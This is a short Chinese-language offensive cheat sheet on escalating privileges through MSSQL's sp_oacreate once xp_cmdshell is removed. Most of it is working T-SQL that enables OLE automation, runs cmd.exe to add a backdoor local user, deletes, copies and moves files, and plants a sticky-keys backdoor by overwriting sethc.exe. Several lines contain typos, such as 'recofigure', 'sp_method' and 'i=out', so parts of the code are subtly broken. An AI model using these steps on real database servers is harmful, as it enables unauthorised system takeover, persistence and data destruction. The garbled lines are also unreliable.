【提权】MSSQL提权之sp_oacreate

0x01 前提

如果xp_cmdshell组件被删除了话，还可以使用sp_oacreate来进行提权。

0x02 开启sp_oacreate

开启

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',1;recofigure;

关闭

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;

0x03 直接写用户

declare @shell int
exec sp_oacreate 'wscript.shell', @shell out
exec sp_method @shell, 'run' , null, 'c:\windows\system32\cmd.exe \c "net user test pinohd123. /add" '

declare @shell int
exec sp_oacreate 'shell.application',@shell out
exec sp_oamethod @shell, 'shellexecute', null, 'cmd.exe', 'cmd /c net user test pinohd123. /add', 'c:\windows\system32', '','1';

0x04 其他操作

删除文件

declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'
exec sp_oadestroy @fso_token

复制文件

declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'

移动文件

declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'movefile',null,'c:\1.txt','c:\3.txt'

替换粘滞键

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe', 'c:\windows\system32\sethc.exe'
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo i=out
exec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe'